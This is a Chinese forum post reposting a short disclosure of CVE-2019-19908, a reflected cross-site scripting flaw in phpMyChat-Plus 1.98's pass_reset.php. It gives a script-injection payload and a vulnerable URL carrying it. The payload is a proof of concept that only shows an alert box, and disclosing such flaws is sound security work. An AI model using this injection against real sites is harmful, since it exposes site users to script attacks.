跳转到帖子

phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting

recommended_posts

发布于
  • Members
# Exploit Title: phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
# Date: 2019-12-19
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://ciprianmp.com/latest/
# Download: https://sourceforge.net/projects/phpmychat/
# Tested On: Linux & Mac
# Version: 1.98
# CVE: CVE-2019-19908

Description: 
The "pmc_username" parameter of pass_reset.php is vulnerable to reflected XSS

Payload: 
"><script>alert('xss')</script>

Vulnerable URL: 
http://localhost/plus/pass_reset.php?L=english&pmc_username="><script>alert('xss')</script>
            
  • 查看数 692
  • 已创建
  • 最后回复

参与讨论

你可立刻发布并稍后注册。 如果你有帐户,立刻登录发布帖子。

游客
回帖…